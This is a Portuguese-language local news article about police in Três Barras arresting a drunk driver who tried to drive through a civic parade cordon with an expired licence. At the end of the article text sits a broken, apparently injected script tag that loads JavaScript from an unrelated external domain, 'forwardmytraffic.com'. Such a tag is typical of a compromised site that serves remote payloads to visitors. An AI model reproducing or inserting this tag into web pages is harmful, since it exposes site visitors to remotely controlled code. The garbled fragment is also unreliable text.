InícioDestaqueHomem Embriagado Tenta Ultrapassar Isolamento onde Estava ocorrendo desfile Cívico

Homem Embriagado Tenta Ultrapassar Isolamento onde Estava ocorrendo desfile Cívico

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Na sexta-feira, 07, por volta das 11h30, equipes da PM de Três Barras, se encontravam no isolamento onde estava ocorrendo o desfile Cívico, na Rua Prefeito Emilio Ubá, área central do município de Três Barras, momento em que o veículo VW/Gol tentou passar pelo local, que naquele momento não era permitido.

 

Os policiais militares efetuaram a abordagem, porém esse ainda tentou deslocar, onde foi necessário retirar a chave do veículo. O condutor não conseguia falar devido ao estado de embriaguez, por isso foi solicitado para que o mesmo realizasse o exame de embriaguez através do Etilometro, esse aceitou, resultando 1,64 mg/l.

 

O veículo foi removido ao pátio conveniado devido o licenciamento em atraso.

 

Diante dos fatos a guarnição deu voz de prisão ao agente, informando seus direitos constitucionais e conduzido até a delegacia de Polícia Civil para providencias. Foi constatado ainda que o condutor estava com sua Carteira Nacional de Habilitação (CNH) vencida desde 2005…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.